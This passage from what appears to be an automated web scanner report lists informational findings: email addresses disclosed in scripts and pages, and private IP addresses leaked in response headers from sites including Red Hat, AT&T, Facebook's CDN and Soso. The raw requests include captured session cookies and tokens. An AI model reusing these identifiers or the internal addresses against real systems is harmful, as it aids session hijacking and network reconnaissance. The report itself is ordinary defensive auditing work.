Last-Modified: Thu, 02 Apr 2009 14:58:17 GMT
ETag: "817e53-649-46693a982f440"
Accept-Ranges: bytes
Content-Length: 1609
Content-Type: text/javascript
Cache-Control: no-store
Date: Mon, 15 Aug 2011 19:05:44 GMT
Connection: close

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

15.16. https://www.redhat.com/j/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /j/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/controls.js HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/cart.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435243515%3Ad1344971243515%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435265712; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%2526oid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 13 Aug 2009 19:32:58 GMT
ETag: "2dc3d0-87e3-4710b00bfee80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 34787
Date: Mon, 15 Aug 2011 19:06:54 GMT
Connection: keep-alive

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

15.17. https://www.redhat.com/j/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /j/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/dragdrop.js HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/cart.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435243515%3Ad1344971243515%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435265712; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%2526oid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 13 Aug 2009 19:32:58 GMT
ETag: "2dc3d1-79c6-4710b00bfee80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 31174
Date: Mon, 15 Aug 2011 19:06:54 GMT
Connection: keep-alive

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

15.18. https://www.redhat.com/j/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /j/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/apps/store/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; s_cc=true; s_nr=1313435218846; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttp%25253A//www.redhat.com/rhel/desktop/%2526oid%253Dhttp%25253A//www.redhat.com/apps/store/desktop/%2526ot%253DA; www-session-id=8ccce98baea8ecd121b0a86afe4a630d

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 02 Apr 2009 14:58:17 GMT
ETag: "817e53-649-46693a982f440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1609
Date: Mon, 15 Aug 2011 19:06:07 GMT
Connection: keep-alive

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

15.19. http://www.sohu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sohu.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:24:05 GMT
Server: SWS
Vary: Accept-Encoding,X-Up-Calling-Line-id,X-Source-ID,X-Up-Bearer-Type
Cache-Control: max-age=70
Expires: Mon, 15 Aug 2011 18:25:15 GMT
Last-Modified: Mon, 15 Aug 2011 18:03:14 GMT
Content-Length: 298682
FSS-Cache: HIT from 31523473.39387985.42556425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="z
...[SNIP]...
<a href="mailto:webmaster@contact.sohu.com">webmaster@contact.sohu.com</a>
...[SNIP]...
<a href="mailto:jubao@contact.sohu.com">jubao@contact.sohu.com</a>
...[SNIP]...

15.20. http://www.wireless.att.com/cell-phone-service/scripts/base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/scripts/base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cell-phone-service/scripts/base.js?2011-08-15-03-37-25 HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966; TLTHID=31A640C8C76B10C7A09DCAEB2DFC8A0E; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 19744
Last-Modified: Mon, 18 Jul 2011 21:51:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/x-javascript
Cache-Control: max-age=900
Date: Mon, 15 Aug 2011 18:20:03 GMT
Connection: close

/* carl@criticalmass.com */
function BaseLibrary(){
   var t = this;
   var v = navigator.appVersion.toLowerCase(), u = navigator.userAgent.toLowerCase(), n = navigator.appName;
   var d = document;
   t.ua = new Object();
   t.u
...[SNIP]...

15.21. http://www.zedo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zedo.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Thu, 21 Jul 2011 15:08:18 GMT
ETag: "164834d-5412-4a895b8087c80"
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 21522
Cache-Control: max-age=418651
Expires: Sat, 20 Aug 2011 15:13:06 GMT
Date: Mon, 15 Aug 2011 18:55:35 GMT
Connection: close

<html>
<head>
<meta name="google-site-verification" content="jAe5iatPlve0j-h6pe6lOCIzQFRTD_MG4U9o4NEyVFI" />
<TITLE>ZEDO Advertising Technology Partner</TITLE>
<META NAME="DESCRIPTION" CONTENT="ZE
...[SNIP]...
<META NAME="author" CONTENT="webmaster@zedo.com">
...[SNIP]...
<a href="mailto:salesinfo@zedo.com">
...[SNIP]...

16. Private IP addresses disclosed  previous  next
There are 80 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


16.1. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDiZJ5bdGDm9-ec&w=50&h=50&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fc%2Fcb%2FJason_momoa.jpg&crop HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.130.45
X-Cnection: close
Content-Length: 1555
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:24:33 GMT
Date: Mon, 15 Aug 2011 18:24:33 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.2. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBxZDh-WFHctlmC&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fen%2F8%2F8d%2FNES_Tetris_Box_Front.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.120.34
X-Cnection: close
Content-Length: 6982
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.3. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBQcoLBhUeX0WOM&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F4%2F45%2FA_small_cup_of_coffee.JPG%2F720px-A_small_cup_of_coffee.JPG HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.51.56
X-Cnection: close
Content-Length: 2644
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.4. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAutVMXyfyUQkkI&w=50&h=50&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fa%2Fac%2FLarge_format_camera_lens.jpg&crop HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.34.43
X-Cnection: close
Content-Length: 2017
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.5. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQArOhScqHW42Gu9&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fen%2F9%2F9b%2FHannibal_movie_poster.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.108.32
X-Cnection: close
Content-Length: 3868
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.6. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCJF-URGNs5XSGa&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2F0%2F03%2FCassia-eller-12.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.185.38
X-Cnection: close
Content-Length: 4220
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.7. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBAcpblxC5N5VsR&w=180&h=540&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fpt%2F1%2F1b%2FThe_X-Files.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.3.26
X-Cnection: close
Content-Length: 3295
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.8. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQB08k9qPy5Bisqb&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2Fa%2Fa3%2FMoon_Dedal_crater.jpg%2F720px-Moon_Dedal_crater.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.228.46
X-Cnection: close
Content-Length: 6199
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.9. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQD1imJygaxI2ZXn&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fa%2Fac%2FLarge_format_camera_lens.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.238.55
X-Cnection: close
Content-Length: 5160
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.10. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAZaNTzDoC1mMTO&w=100&h=300&url=http%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F9%2F95%2FMichael_Giacchino.jpg%2F720px-Michael_Giacchino.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.155.30
X-Cnection: close
Content-Length: 4570
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.11. http://news.soso.com/n.q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.soso.com
Path:   /n.q

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /n.q?w=xss&pid=n.res.time.m&ty=c&sd=3&st=r HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss; pid=web.cf; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; __utma=169109310.1703238222.1313432881.1313432881.1313432881.1; __utmb=169109310.1.10.1313432881; __utmc=169109310; __utmz=169109310.1313432881.1.1.utmcsr=soso.com|utmccn=(referral)|utmcmd=referral|utmcct=/q

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:35:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:35:18 GMT
Vary: Accept-Encoding
Content-Length: 24733

<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=gb2312" />
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <title>xss - ........</title>
       <
...[SNIP]...
<a href="http://t.soso.com/search?remoteplace=rec_list.xinwen_list.b&remoteip=10.163.132.23&qid=0&sid=0&cid=newstot.box&ty=c&w=xss" target="_blank">
...[SNIP]...

16.12. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yP/r/C1LO4_1OOg0.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/yP/r/C1LO4_1OOg0.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/yP/r/C1LO4_1OOg0.png HTTP/1.1
Host: profile.ak.fbcdn.net
Proxy-Connection: keep-alive
